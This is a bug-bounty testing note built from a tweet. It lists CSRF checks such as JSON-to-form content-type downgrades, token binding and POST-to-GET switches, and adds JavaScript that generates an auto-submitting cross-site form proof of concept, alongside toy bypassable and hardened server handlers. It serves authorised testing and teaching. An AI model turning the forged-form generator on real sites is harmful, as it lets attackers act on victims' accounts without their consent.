https://twitter.com/Rhynorater/status/1585640808568348674?s=20&t=Z5fB7J704bmtvT6kvV2c2w
-
How is CSRF protection implemented? Does the application accept only the application/json content-type? If so, can you convert {"name":"Justin"} to name=Justin and resend it with Content-Type application/x-www-form-urlencoded (or text/plain), i.e. one of the types a cross-site <form> can send without a preflight? Does a second body parser on the server still accept it? Is the CSRF token tied to the account? To the session? Are there any "unauthed" CSRF tokens (tokens obtainable without being logged in)? Can you switch POST -> GET? If not, what status do you get? A 405 means the router matched the path but GET is disallowed on that endpoint; try the same switch on other endpoints.
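Added example (not from the tweet or the note above): the JSON -> form-body downgrade as a CSRF proof of concept, the POST -> GET variant, and a toy server-side handler in both the bypassable and the hardened form. It generalises the single field from the note to nested objects and arrays using bracket notation. The target URL, field names, request objects and the Sec-Fetch-Site check in the hardened handler are assumptions made for illustration, not anything the note describes.

```javascript
// Added example, not code from the tweet or the note above. Target URL, field names
// and request objects are constructed for illustration.

// Flatten a JSON value into form fields using bracket notation
// ({user:{name:"Justin"}} -> user[name]=Justin, {ids:[1,2]} -> ids[]=1&ids[]=2),
// which Rack, PHP and Express (qs, extended: true) decode back into nesting.
function jsonToForm(value, prefix = '', params = new URLSearchParams()) {
  if (Array.isArray(value)) {
    for (const item of value) jsonToForm(item, `${prefix}[]`, params);
  } else if (value !== null && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) {
      jsonToForm(v, prefix ? `${prefix}[${k}]` : k, params);
    }
  } else {
    params.append(prefix, String(value));
  }
  return params.toString();
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Auto-submitting cross-site form: the way a browser sends a credentialed POST to
// another origin with no CORS preflight. It can only carry
// application/x-www-form-urlencoded, multipart/form-data or text/plain.
function csrfFormHtml(action, formBody) {
  const inputs = [...new URLSearchParams(formBody)]
    .map(([k, v]) => `  <input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join('\n');
  return [
    `<form id="csrf" method="POST" action="${escapeHtml(action)}" enctype="application/x-www-form-urlencoded">`,
    inputs,
    '</form>',
    '<script>document.getElementById("csrf").submit()</script>',
  ].join('\n');
}

// POST -> GET variant: same fields in the query string. A 405 from the server means
// the route exists but rejects GET; any other status tells you how the router treats it.
function toGetUrl(action, formBody) {
  const sep = action.includes('?') ? '&' : '?';
  return `${action}${sep}${formBody}`;
}

// --- toy server side (assumed shapes, not a real framework) ------------------

function mediaType(req) {
  return (req.headers['content-type'] || '').split(';')[0].trim().toLowerCase();
}

// Bypassable: "we only speak JSON" is just the first branch of a body parser that
// also accepts form bodies, so the forged form above is parsed and acted on.
function looseHandler(req) {
  const ct = mediaType(req);
  let body = null;
  if (ct === 'application/json') body = JSON.parse(req.body);
  else if (ct === 'application/x-www-form-urlencoded') body = Object.fromEntries(new URLSearchParams(req.body));
  if (!body) return { ok: false, reason: 'unsupported content-type' };
  return { ok: true, name: body.name };
}

// Hardened: reject anything that is not application/json (a type no <form> can
// send, and one fetch() cannot send cross-origin without a preflight), and
// additionally refuse cross-site requests via Sec-Fetch-Site. A per-session CSRF
// token would be a further layer and is not modelled here.
function strictHandler(req) {
  if (mediaType(req) !== 'application/json') return { ok: false, reason: 'content-type' };
  const site = req.headers['sec-fetch-site'];
  if (site && site !== 'same-origin') return { ok: false, reason: 'cross-site' };
  let body;
  try { body = JSON.parse(req.body); } catch { return { ok: false, reason: 'bad json' }; }
  return { ok: true, name: body.name };
}

// Demo on the note's example body; all values are local to the function.
function demo() {
  const form = jsonToForm({ name: 'Justin' }); // name=Justin
  const forged = {
    headers: { 'content-type': 'application/x-www-form-urlencoded', 'sec-fetch-site': 'cross-site' },
    body: form,
  };
  return {
    html: csrfFormHtml('https://target.example/api/profile', form),
    getUrl: toGetUrl('https://target.example/api/profile', form),
    loose: looseHandler(forged),   // { ok: true, name: 'Justin' }  <- CSRF succeeds
    strict: strictHandler(forged), // { ok: false, reason: 'content-type' }
  };
}

console.log(demo());
```

Run with `node` to print the PoC page, the GET variant and both handler verdicts. If the real target's loose parser is reachable the way `looseHandler` is, the content-type alone was never the CSRF defence; the hardened handler shows the two checks that actually close the cross-site path.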
-
Is caching implemented?